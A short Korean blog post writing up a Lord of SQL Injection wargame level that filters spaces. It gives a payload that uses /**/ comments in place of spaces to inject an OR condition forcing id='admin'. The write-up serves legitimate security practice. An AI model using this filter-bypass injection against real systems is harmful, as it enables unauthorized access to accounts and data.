티스토리 뷰

마흔세 번째 글.

 

 

1. 코드 분석

공백을 필터링하고 있었고 result의 id가 admin이면 문제가 풀리게 된다.

 

 

2. Exploit

공백을 우회하는 방법은 매우 많다.(Reference 참고)

 

?pw=?pw='/**/or/**/id='admin'%23

나는 주석을 이용하였다.

 

 

 

 

Reference

https://posix.tistory.com/42 //공백우회

https://portswigger.net/support/sql-injection-bypassing-common-filters

'writeup > LOS' 카테고리의 다른 글

[Lord of SQL injection] troll  (0) 2021.07.10
[Lord of SQL injection] darkelf  (0) 2021.07.02
[Lord of SQL injection] orc  (0) 2021.06.28
[Lord of SQL injection] goblin  (0) 2021.06.28
[Lord of SQL injection] cobolt  (0) 2021.06.20